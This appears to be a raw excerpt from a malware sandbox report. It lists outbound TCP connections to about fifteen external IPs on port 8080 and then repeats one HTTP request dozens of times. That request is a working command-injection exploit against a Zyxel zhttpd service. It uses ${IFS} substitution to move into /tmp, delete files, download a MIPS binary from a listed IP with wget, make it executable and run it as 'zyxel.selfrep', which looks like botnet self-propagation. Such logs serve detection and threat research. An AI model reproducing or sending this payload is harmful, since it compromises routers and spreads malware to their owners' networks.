            Source: global trafficTCP traffic: 192.168.2.13:49547 -> 19.248.90.44:8080
            Source: global trafficTCP traffic: 192.168.2.13:49547 -> 173.227.117.212:8080
            Source: global trafficTCP traffic: 192.168.2.13:49547 -> 76.251.236.207:8080
            Source: global trafficTCP traffic: 192.168.2.13:49547 -> 217.197.140.170:8080
            Source: global trafficTCP traffic: 192.168.2.13:49547 -> 41.174.184.244:8080
            Source: global trafficTCP traffic: 192.168.2.13:49547 -> 206.200.197.177:8080
            Source: global trafficTCP traffic: 192.168.2.13:49547 -> 45.171.72.162:8080
            Source: global trafficTCP traffic: 192.168.2.13:49547 -> 170.176.75.239:8080
            Source: global trafficTCP traffic: 192.168.2.13:49547 -> 133.177.124.81:8080
            Source: global trafficTCP traffic: 192.168.2.13:49547 -> 95.144.169.167:8080
            Source: global trafficTCP traffic: 192.168.2.13:49547 -> 207.227.87.187:8080
            Source: global trafficTCP traffic: 192.168.2.13:49547 -> 143.157.106.244:8080
            Source: global trafficTCP traffic: 192.168.2.13:49547 -> 218.103.153.41:8080
            Source: global trafficTCP traffic: 192.168.2.13:49547 -> 147.211.128.102:8080
            Source: global trafficTCP traffic: 192.168.2.13:49547 -> 67.200.21.6:8080
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
